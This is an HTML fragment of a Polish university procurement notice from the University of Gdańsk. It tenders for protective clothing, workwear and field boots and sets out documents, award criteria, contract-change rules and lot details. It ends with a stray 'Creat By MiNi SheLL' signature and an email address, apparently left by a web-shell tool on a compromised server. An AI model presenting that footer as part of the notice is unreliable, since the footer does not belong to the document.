<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto Wykonawca złoży wraz z ofertą:
1) Oświadczenie o podwykonawcach - załącznik nr 6 (do SIWZ); Wykonawca wykonujący zamówienie wyłącznie siłami własnymi nie ma obowiązku dołączenia do oferty tego załącznika.
2) Zaakceptowany przez Wykonawcę projekt umowy - załącznik nr 5 część I lub II(do SIWZ), Wykonawca może też zastosować się do informacji zawartej  w rozdz. XVI pkt. 1. Wykonawcy ubiegający się wspólnie o udzielenie zamówienia składają jeden komplet dokumentów, o których mowa powyżej.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin dostawy częściowej - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany postanowień zawartej umowy 
1. Istotne zmiany postanowień umowy dopuszczalne są w następujących przypadkach:
1) zmiany obowiązujących przepisów prawa,
2) zaistnienia siły wyższej,
3) zmiany obowiązującej stawki podatku VAT - w takiej sytuacji ceny jednostkowe brutto z formularza cenowego za część zamówienia, w stosunku do którego obowiązek podatkowy powstanie po zmianie stawki podatku VAT, zostaną ustalone 
z uwzględnieniem tej zmienionej stawki. W takim przypadku Wykonawca będzie zobowiązany do przekazania Zamawiającemu formularza cenowego zawierającego zaktualizowane ceny jednostkowe brutto oraz podstawy prawnej aktualizacji, Zmiana cen jednostkowych brutto nie wpływa  na zmianę (zwiększenie) łącznej wartości wynagrodzenia Wykonawcy, o którym mowa w § 3 ust. 2 umowy,
4) zmiany dotyczącej w szczególności terminu realizacji umowy:
a) jeżeli uzasadnione to będzie okolicznościami leżącymi po stronie Zamawiającego, 
w szczególności sytuacją finansową, zdolnościami płatniczymi, z przyczyn organizacyjnych lub technicznych,
b) z przyczyn ekonomicznych, organizacyjnych lub technicznych niezawinionych przez Wykonawcę, po uzyskaniu akceptacji Zamawiającego,
c) gdy zaistniała inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności.
5) zmiany zakresu podwykonawstwa w porównaniu do wskazanego w załączniku do oferty.
2. Zmiany postanowień zawartej umowy wymagają dla swej ważności formy pisemnej w postaci aneksu podpisanego przez obie strony, z zastrzeżeniem § 5 ust. 13 umowy.
3. Wniosek o wprowadzenie zmian, o których mowa w ust. 1 pkt. 1) - 5) musi być złożony na piśmie i uzasadniony</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ug.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet Gdański Dział Zamówień Publicznych, ul. Bażyńskiego 8,  pokój nr 115, I piętro,  80 - 309 Gdańsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.03.2016 godzina 11:00, miejsce: Uniwersytet Gdański Dział Zamówień Publicznych, ul. Bażyńskiego 8,  pokój nr 115, I piętro,  80 - 309 Gdańsk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zgodnie z art. 24 ust. 2a ustawy Zamawiający wyklucza z postępowania o udzielenie zamówienia Wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy Wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co Zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych. Zamawiający nie wyklucza z postępowania o udzielenie zamówienia Wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszeniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia.

1. Zamawiający nie dopuszcza możliwości składania ofert wariantowych. W przypadku, gdy oferta zawierać będzie propozycje rozwiązań alternatywnych lub wariantowych - oferta zostanie odrzucona.
2. Zamawiający nie zamierza zawrzeć umowy ramowej jak i ustanowienia dynamicznego systemu zakupów.
3. Zamawiający nie zamierza dokonać wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej.
4. Zamawiający dopuszcza możliwość  składania ofert równoważnych w II części postępowania zgodnie z zapisem w  rozdziale  II SIWZ.
5. Zamawiający dopuszcza możliwość składania ofert częściowych (według I lub II części postępowania).
6. Zamawiający nie dopuszcza możliwości dokonania przedpłaty.
7. Koszty opracowania i dostarczenia oferty oraz uczestnictwa w przetargu obciążają wyłącznie   Wykonawcę.
8. Zamawiający udostępnia SIWZ na stronie internetowej www.ug.edu.pl od dnia zamieszczenia publikacji w Biuletynie Zamówień Publicznych do upływu terminu  składania ofert.
9. SIWZ w formie papierowej na wniosek Wykonawcy przekazuje się odpłatnie (10 groszy za stronę + koszty przesyłki - listem poleconym za zwrotnym potwierdzeniem odbioru) - art. 42 ust 2 ustawy.
10. Zamawiający w szczególnie uzasadnionych przypadkach może w każdym czasie, przed upływem  terminu do składania ofert, zmienić treść SIWZ. Dokonaną  zmianę  Zamawiający przekazuje niezwłocznie wszystkim Wykonawcom, którym przekazano SIWZ oraz zamieści na stronie internetowej Zamawiającego.
11. Jeżeli zmiana treści SIWZ prowadzi do zmiany treści ogłoszenia o zamówieniu,  Zamawiający  zamieszcza ogłoszenie o zmianie  ogłoszenia w Biuletynie Zamówień Publicznych.
12. Jeżeli w wyniku zmiany treści SIWZ nieprowadzącej do zmiany treści ogłoszenia 
o zamówieniu jest niezbędny dodatkowy czas na wprowadzenie zmian  w ofertach,  Zamawiający przedłuży termin składania ofert.
13. O przedłużeniu terminu składania ofert Zamawiający niezwłocznie zamieści informację na stronie internetowej  Zamawiającego - art. 38 ust. 6 ustawy.
14. Zgodnie z zapisem art. 8 ustawy Pzp oraz regulacją ustawy o dostępie do informacji publicznej postępowanie o udzielenie zamówienia publicznego jest jawne. Zamawiający może ograniczyć  dostęp do informacji związanych z postępowaniem tylko w przypadkach określonych  w ustawie.
15. Klauzula  informacyjna dotycząca danych osobowych:
Zgodnie z art. 24 ust. 1 ustawy z dnia 29 sierpnia 1997 roku o ochronie danych osobowych (tekst jednolity Dz. U. z 2015 r. poz. 2135) Zamawiający informuje, iż:
1) administratorem danych osobowych Wykonawcy pozyskanych w związku z przystąpieniem do postępowania o udzielenie zamówienia publicznego, jest Uniwersytet Gdański, z siedzibą  w Gdańsku (80-309) przy ul. Bażyńskiego 8, zwany dalej Zamawiającym,
2) dane  osobowe  przetwarzane będą w celu dopełnienia obowiązku określonego w przepisach ustawy z dnia 29 stycznia 2004 roku - Prawo zamówień publicznych (tekst jednolity Dz. U. z 2015r. poz. 2164),
3) Wykonawca posiada prawo dostępu do treści swoich danych oraz  ich poprawiania,
4) podanie  Zamawiającemu  danych osobowych Wykonawcy jest dobrowolne, jednakże jest to niezbędne do realizacji celu, o którym mowa w pkt 2.
16. Zamawiający nie przewiduje możliwości udzielenia zamówień uzupełniających.
17. Zamawiający dopuszcza możliwość korzystania z usług podwykonawców - rozdział V pkt 3 ppkt 1) SIWZ. 
1) Wykonawca zobowiązany jest przedstawić w załączniku nr 6 część I, II (do SIWZ), jaką część zamówienia zamierza powierzyć podwykonawcom.
2) Zawarta umowa o podwykonawstwo między wybranym przez Zamawiającego Wykonawcą a Podwykonawcą musi mieć formę pisemną o charakterze odpłatnym, a także musi określać, jaka część zamówienia zostanie wykonana przez Podwykonawcę. Termin zapłaty wynagrodzenia Podwykonawcy przewidziany w umowie o podwykonawstwo nie może być dłuższy niż 30 dni od dnia doręczenia Wykonawcy faktury lub rachunku, potwierdzających wykonanie zleconych Podwykonawcy zadań.
3) Wprowadzenie podwykonawcy na zasadach określonych w § 10 projektu umowy, w sytuacji gdy Wykonawca zadeklarował w ofercie wykonanie zamówienia własnymi siłami, będzie  możliwe  w przypadku,  gdy  Wykonawca powiadomi o tym fakcie Zamawiającego, wskazując przyczynę i zakres podwykonawstwa, co wymaga wcześniejszej akceptacji Zamawiającego.
4) Wprowadzenie podwykonawcy nie może naruszać zapisów SIWZ i umowy na podstawie których dokonano wyboru oferty Wykonawcy.
5) Wykonawca ponosi odpowiedzialność za działania lub zaniechanie działań podwykonawców tak jak za działania własne.
18. Zgodnie z art. 92 ustawy Zamawiający powiadomi o wyniku postępowania wszystkich Wykonawców, którzy złożyli oferty informując o:
1) wyborze najkorzystniejszej oferty, podając nazwę (firmę) albo imię i nazwisko, siedzibę albo miejsce zamieszkania i adres Wykonawcy, którego ofertę wybrano, uzasadnienie jej wyboru oraz nazwy (firmy) albo imiona i nazwiska, siedziby albo miejsca zamieszkania i adresy Wykonawców, którzy złożyli oferty, a także punktację przyznaną ofertom,
2) Wykonawcach, których oferty zostały odrzucone, podając uzasadnienie faktyczne i prawne,
3) Wykonawcach,  którzy zostali wykluczeni z postępowania o udzielenie  zamówienia publicznego podając uzasadnienie faktyczne i prawne,
4) terminie, określonym zgodnie z art. 94 ust. 1 lub 2 ustawy, po którego upływie umowa 
w sprawie zamówienia publicznego może być zawarta. 
19. Niezwłocznie po wyborze najkorzystniejszej oferty Zamawiający zamieszcza informacje, o których mowa w pkt. 1 ppkt. 1) na stronie internetowej oraz w miejscu publicznie dostępnym w swojej  siedzibie.
20. W sytuacji opisanej w art. 93 ust. 1 pkt. 4 Zamawiający unieważnia postępowanie o udzielenie zamówienia publicznego.
21. W sytuacji opisanej w art. 93 ust. 1 a i 1 b Zamawiający może unieważnić postępowanie o udzielenie zamówienia publicznego.
22. W przypadku, o którym mowa w art. 93 ust. 1 pkt. 4, jeżeli złożono ofertę, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z przepisami o podatku od towarów 
i usług, do ceny najkorzystniejszej oferty lub oferty z najniższą ceną dolicza się podatek od towarów i usług, który Zamawiający miałby obowiązek rozliczyć zgodnie z tymi przepisami.
23. O unieważnieniu postępowania o udzielenie zamówienia Zamawiający zawiadamia równocześnie wszystkich Wykonawców, którzy:
1) ubiegali się o udzielenie zamówienia - w przypadku unieważnienia postępowania przed upływem terminu składania ofert,
2) złożyli oferty - w przypadku unieważnienia postępowania po upływie terminu składania ofert - podając uzasadnienie faktyczne i prawne. 
24. W przypadku unieważnienia postępowania o udzielenie zamówienia Zamawiający na wniosek Wykonawcy, który ubiegał się o udzielenie zamówienia, zawiadamia o wszczęciu kolejnego postępowania, które dotyczy tego samego przedmiotu zamówienia lub obejmuje ten sam przedmiot zamówienia. 
25.Zamawiający nie wymaga wpłacenia zabezpieczenia należytego wykonania umowy.
26. Zamawiający przekazuje do wiadomości Wykonawców projekt umowy - załącznik nr 5 część I, część II (do SIWZ). Wykonawca może nanieść parafkę akceptując projekt umowy załączony do SIWZ na ostatniej stronie i załączyć niniejszy projekt do oferty albo ograniczyć się do oświadczenia odnoszącego się do treści umowy zawartego w formularzu ofertowym.
27. Podpisanie umowy z wybranym Wykonawcą nastąpi w terminie nie krótszym niż 5 dni od dnia przesłania zawiadomienia o wyborze najkorzystniejszej oferty, jednak nie później niż w dniu, w którym upływa termin związania ofertą, chyba, że zaistnieją przesłanki przewidziane w art. 94 ust. 2 ustawy.
28. Miejscem zawarcia umowy jest siedziba Zamawiającego. Umowa będzie przesłana do podpisu  Wykonawcy lub przedstawiona do podpisu w siedzibie Zamawiającego w zależności od ustaleń dokonanych przez strony.
29. Wykonawca zobowiązany jest do podpisania umowy w terminie wyznaczonym przez Zamawiającego oraz do niezwłocznego odesłania jej kurierem do Zamawiającego (na adres Działu Zamówień Publicznych UG, 80-309 Gdańsk, ul. Bażyńskiego 8, jednak nie później niż w ciągu 5 dni od dnia jej otrzymania. W przypadku nie zachowania ww. terminu Zamawiający może uznać, iż Wykonawca uchyla się od zawarcia umowy.
30. Umowa w sprawie zamówienia publicznego może zostać zawarta także po upływie terminu związania ofertą, jeżeli Zamawiający przekazał Wykonawcom informację o wyborze oferty przed upływem terminu związania ofertą, a Wykonawca wyraził zgodę na zawarcie umowy na warunkach określonych w złożonej ofercie.
31. Jeżeli Wykonawca, którego oferta została wybrana, uchyla się od zawarcia umowy w sprawie zamówienia publicznego, Zamawiający może wybrać ofertę najkorzystniejszą spośród pozostałych ofert bez przeprowadzania ich ponownego badania i oceny, chyba że zachodzą przesłanki unieważnienia postępowania, o których mowa w art. 93 ust. 1 ustawy.
32. Do dnia podpisania umowy Wykonawca zobowiązany jest dostarczyć kopię umowy regulującej współpracę Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego (art. 23 ust. 4 ustawy).
33. Istotne zmiany postanowień zawartej umowy oraz warunki ich wprowadzenia opisane są w § 8 załącznika nr 5 część I, II (do SIWZ) - projekt umowy.
34. Zamawiający, poza innymi przypadkami określonymi w powszechnie obowiązujących przepisach, a zwłaszcza w Kodeksie cywilnym, może odstąpić od umowy zgodnie z zapisami w § 9 załącznika nr 5 część I, II (do SIWZ) - projekt umowy.
35. Zamawiający, poza innymi przypadkami określonymi w powszechnie obowiązujących przepisach, a zwłaszcza w Kodeksie cywilnym, może odstąpić od umowy  w następujących przypadkach:
1) Zamawiający może odstąpić od umowy, jeśli wykonanie umowy nie leży w interesie publicznym, zgodnie z art. 145 ustawy Prawo zamówień publicznych. W tym wypadku, Zamawiający może odstąpić od umowy w terminie  30 dni od powzięcia wiadomości o tych okolicznościach,
2) w wypadku określonym w pkt. 1) Wykonawca może żądać jedynie wynagrodzenia należnego mu  z   tytułu wykonania  części umowy,
3) Zamawiający może również odstąpić od umowy na zasadach określonych w pkt.1)  i 2)  w wypadku: likwidacji przedsiębiorstwa Wykonawcy, wydania nakazu zajęcia istotnej części majątku Wykonawcy,
4) Zamawiający może odstąpić od umowy w całości bądź w części w przypadku, gdy opóźnienie dostawy częściowej  przekroczy 14 dni kalendarzowych w stosunku do terminu określonego w § 2 ust 2 umowy, naliczając Wykonawcy karę umowną, o której mowa w § 7 ust. 2 umowy.
5) Zamawiający może odstąpić od umowy w całości bądź w części w przypadku, gdy zamówienie jest realizowane wadliwie lub sprzecznie z umową (w tym również w zakresie świadczeń gwarancyjnych), w szczególności w przypadku dostarczenia przedmiotu umowy niezgodnego z wymogami SIWZ lub umowy, po bezskutecznym upływie wyznaczonego Wykonawcy nie krótszego niż 7 dni dodatkowego terminu na usunięcie naruszeń. W takim przypadku Zamawiający naliczy Wykonawcy karę umowną, o której mowa w § 7 ust. 2 umowy.
36. Zamawiający może odstąpić od umowy w przypadkach, o których mowa w ust. 1 pkt. 4) i 5), w terminie 30 dni od powzięcia wiadomości o tych okolicznościach.
37. Ustanie obowiązywania umowy, niezależnie od przyczyny i podstawy, w tym na skutek odstąpienia od umowy przez Zamawiającego, nie pozbawia Zamawiającego prawa dochodzenia kar umownych i odszkodowań przewidzianych w umowie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sukcesywna dostawa odzieży ochronnej, roboczej oraz obuwia dla Uniwersytetu Gdańskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część  I
(CPV) : 18131000-6; 18141000-9; 18142000-6; 18223200-0,
sukcesywna dostawa odzieży ochronnej, roboczej oraz obuwia zwanych w dalszej części odzieżą.
1) Pod pojęciem sukcesywna dostawa należy rozumieć - dostawy dokonywane częściowo w różnych ilościach nie przekraczających wartości umowy.
2) Szczegółowy wykaz odzieży (opisy i ilości) zawarte są w załączniku nr 2 do SIWZ.
3) Podane ilości poszczególnych asortymentów odzieży w załączniku nr 2 do SIWZ są ilościami przewidywanymi (szacunkowymi) nie wiążącymi dla Zamawiającego i mogą ulec zmianie co nie będzie stanowić zmiany umowy, a łączne wynagrodzenie brutto Wykonawcy nie przekroczy kwoty  określonej w § 3 ust.2 umowy.
4) Wykonawca poniesie wszelkie koszty niezbędne do zrealizowania zamówienia wynikające ze szczegółowej specyfikacji zawartej w formularzu cenowym stanowiącym załącznik nr 2 (do SIWZ), jak również w nim nie ujęte, a bez których nie można wykonać zamówienia.
5) Wykonawca dostarczy odzież na swój koszt własnym transportem.
6) Termin dostawy zamówionej partii odzieży nie będzie dłuższy niż: 10 dni roboczych od dnia złożenia zamówienia przez Zamawiającego, nie uwzględnia się przy obliczaniu terminu dnia złożenia zamówienia z uwzględnieniem zapisów rozdziału XII pkt 1 ppkt 2 termin dostawy jest jednym z kryteriów oceny ofert.  
7) Wielkość i częstotliwość zamówień poszczególnych partii odzieży wynikać będzie z jednostronnych dyspozycji Zamawiającego (przewiduje się 12 zamówień w czasie trwania umowy),
8) Zamówienia przekazywane będą Wykonawcy drogą elektroniczną, z podaniem zapotrzebowania ilościowego oraz rozmiarów odzieży.  
9) Miejsce dostaw częściowych partii odzieży: magazyn Zamawiającego 80-308 Gdańsk, ul. Wita Stwosza 58, od poniedziałku do piątku w godzinach od 7:00 - 15:00, z wyłączeniem dni ustawowo wolnych od pracy i dni wolnych wyznaczonych u Zamawiającego.
10) Wykonawca skontaktuje się z osobą wymienioną w § 5 ust. 12 umowy w celu potwierdzenia dokładnego terminu dostawy, jednak nie może on przekroczyć terminu o którym mowa w § 2 ust. 2 umowy.
11) Dostawę każdorazowo uważać się będzie za zrealizowaną w terminie, jeżeli wszystkie pozycje zamieszczone w zamówieniu częściowym  Zamawiającego zostaną dostarczone do miejsca dostawy wskazanego, w pkt 9 i odebrane w całości protokołem odbioru, podpisanym bez zastrzeżeń.
12) Zamawiający może odmówić przyjęcia  odzieży w przypadku:
a) stwierdzenia rozbieżności pomiędzy przedstawioną w ofercie a dostarczoną przez Wykonawcę,
b) widocznego uszkodzenia lub wad  odzieży, uniemożliwiającej jej użycie,
c) niezgodności rozmiarów dostarczonej odzieży z zamawianą. 
13) W przypadkach określonych w ppkt. 12, przedstawiciel Zamawiającego, o którym mowa w § 5 ust. 12 umowy sporządza protokół zawierający przyczyny odmowy odebrania odzieży, a Wykonawca jest obowiązany do jej wymiany na nową wolną od wad w terminie uzgodnionym z Zamawiającym.
Jeżeli tak ustalony termin przekroczy termin realizacji zamówienia, o którym mowa w § 2 ust. 2 umowy,  Zamawiający naliczy Wykonawcy karę umowną zgodnie z § 7 ust. 1 pkt. 1)  umowy.
14) Zamawiający wymaga aby dostarczona  odzież  posiadała nienaruszone cechy pierwotnego opakowania, była opatrzona metkami z nazwą producenta, składem tkaniny, materiału, z którego została wykonana, sposobem czyszczenia (prania), konserwacji, prasowania i rozmiarami.
15) Zamawiający zastrzega sobie prawo do rezygnacji z części przedmiotu zamówienia (w ramach prawa opcji) o wartości maksymalnie 20% wynagrodzenia brutto Wykonawcy określonego w § 3 ust. 2 umowy. W tym przypadku Wykonawcy nie przysługują roszczenia odszkodowawcze wobec Zamawiającego, przewidziana rezygnacja spowoduje odpowiednią zmianę ostatecznej wartości wynagrodzenia należnego Wykonawcy, skorzystanie z prawa opcji nie stanowi zmiany umowy.   
16) Pozycje odzieży nr 1, 2, 3,  4, 10, 11, 12, 13, 15, 16, 17, 18, 20, 29, 30, 49, 50, 51, 52, 53, 54, 56, 58 z załącznika nr 2 do SIWZ mają posiadać certyfikat normy europejskiej CE.
17) Gwarancja na odzież 12 miesięcy zgodnie z § 6  umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.13.10.00-6, 18.14.10.00-9, 18.14.20.00-6, 18.22.32.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin dostawy częściowej - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sukcesywna dostawa kurtek terenowych i butów terenowych dla Uniwersytetu Gdańskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> II część

(CPV): 18223200-0; 18815000-5,
Sukcesywna dostawa kurtek terenowych i butów terenowych zwanych w dalszej części odzieżą terenową.
1) Pod pojęciem sukcesywna dostawa należy rozumieć - dostawy dokonywane częściowo w różnych ilościach nie przekraczających wartości umowy.
2) Szczegółowy wykaz odzieży terenowej (opisy i ilości) zawarte są w załączniku nr 2 do SIWZ.
3) podane ilości poszczególnych asortymentów odzieży terenowej w załączniku nr 2 do SIWZ są ilościami przewidywanymi (szacunkowymi) nie wiążącymi dla Zamawiającego i mogą ulec zmianie co nie będzie stanowić zmiany umowy, a łączne wynagrodzenie brutto Wykonawcy nie przekroczy kwoty  określonej w § 3 ust.2 umowy.
4) Wykonawca poniesie wszelkie koszty niezbędne do zrealizowania zamówienia wynikające ze szczegółowej specyfikacji zawartej w formularzu cenowym stanowiącym załącznik nr 2 (do SIWZ), jak również w nim nie ujęte a bez których nie można wykonać zamówienia.
5) Wykonawca dostarczy odzież terenową na swój koszt własnym transportem.
6) Termin dostawy zamówionej partii odzieży terenowej nie będzie dłuższy niż: 10 dni roboczych od dnia złożenia zamówienia przez Zamawiającego, nie uwzględnia się przy obliczaniu terminu dnia złożenia zamówienia z uwzględnieniem zapisów rozdziału XII pkt 1 ppkt 2 termin dostawy jest jednym z kryteriów oceny ofert.  
7) Wielkość i częstotliwość zamówień poszczególnych partii odzieży terenowej wynikać będzie z jednostronnych dyspozycji Zamawiającego (przewiduje się 4 zamówienia w czasie trwania umowy).
8) Zamówienia przekazywane będą Wykonawcy drogą elektroniczną, z podaniem zapotrzebowania ilościowego oraz rozmiarów odzieży terenowej.
9) Miejsce dostaw częściowych partii odzieży terenowej: magazyn Zamawiającego 80-308 Gdańsk, ul. Wita Stwosza 58 od poniedziałku do piątku w godzinach od 7:00 - 15:00, z wyłączeniem dni ustawowo wolnych od pracy i dni wolnych wyznaczonych u Zamawiającego.
10) Wykonawca skontaktuje się z osobą wymienioną w § 5 ust. 11 umowy w celu potwierdzenia dokładnego terminu dostawy, jednak nie może on przekroczyć terminu o którym mowa w § 2 ust. 2 umowy.
11) Dostawę każdorazowo uważać się będzie za zrealizowaną w terminie, jeżeli wszystkie pozycje zamieszczone w zamówieniu częściowym  Zamawiającego zostaną dostarczone do miejsca dostawy wskazanego, w pkt 9 i odebrane w całości protokołem odbioru, podpisanym bez zastrzeżeń.
12) Zamawiający może odmówić przyjęcia  odzieży terenowej w przypadku:
a) stwierdzenia rozbieżności pomiędzy przedstawioną w ofercie a dostarczoną przez Wykonawcę,
b) widocznego uszkodzenia lub wad  odzieży terenowej, uniemożliwiającej jej użycie,
c) niezgodności rozmiarów dostarczonej odzieży terenowej z zamawianą.
13) W przypadkach określonych w ppkt. 12, przedstawiciel Zamawiającego, o którym mowa w § 5 ust. 11 umowy sporządza protokół zawierający przyczyny odmowy odebrania odzieży terenowej, 
a Wykonawca jest obowiązany do jej wymiany na nową wolną od wad w terminie uzgodnionym z Zamawiającym.
Jeżeli tak ustalony termin przekroczy termin realizacji zamówienia, o którym mowa w § 2 ust. 2 umowy, Zamawiający naliczy Wykonawcy karę umowną zgodnie z § 7 ust. 1 pkt. 1) umowy,
14) Zamawiający wymaga aby dostarczona  odzież terenowa posiadała nienaruszone cechy pierwotnego opakowania:
a) kurtki  opatrzone były wszytymi metkami z nazwą producenta, składem tkaniny temperaturą prania, konserwacji,  prasowania i rozmiarami,
b) buty opatrzone były metkami z nazwą producenta, opisem sposobu konserwacji i rozmiarem.
15) Zamawiający zastrzega sobie prawo do rezygnacji z części przedmiotu zamówienia (w ramach prawa opcji) o wartości maksymalnie 20% wartości brutto wynagrodzenia Wykonawcy określonego w § 3 ust. 2 umowy. W tym przypadku Wykonawcy nie przysługują roszczenia odszkodowawcze wobec Zamawiającego, przewidziana rezygnacja spowoduje odpowiednią zmianę ostatecznej wartości wynagrodzenia należnego Wykonawcy, skorzystanie z prawa opcji nie stanowi zmiany umowy.   
16) Zamawiający dopuszcza możliwość złożenia oferty równoważnej. Pod pojęciem równoważności rozumieć należy, iż Wykonawca zapewni uzyskanie parametrów nie gorszych od opisanych przez Zamawiającego w załączniku nr 2 do SIWZ. Wykonawca, który powołuje się na rozwiązania równoważne opisywanym przez Zamawiającego, jest obowiązany wykazać, że oferowane przez niego dostawy spełniają wymagania określone przez Zamawiającego - art. 30 ust. 5 ustawy.
17) Gwarancja na odzież terenową 12 miesięcy zgodnie z § 6  umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.22.32.00-0, 18.81.50.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin dostawy częściowej - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com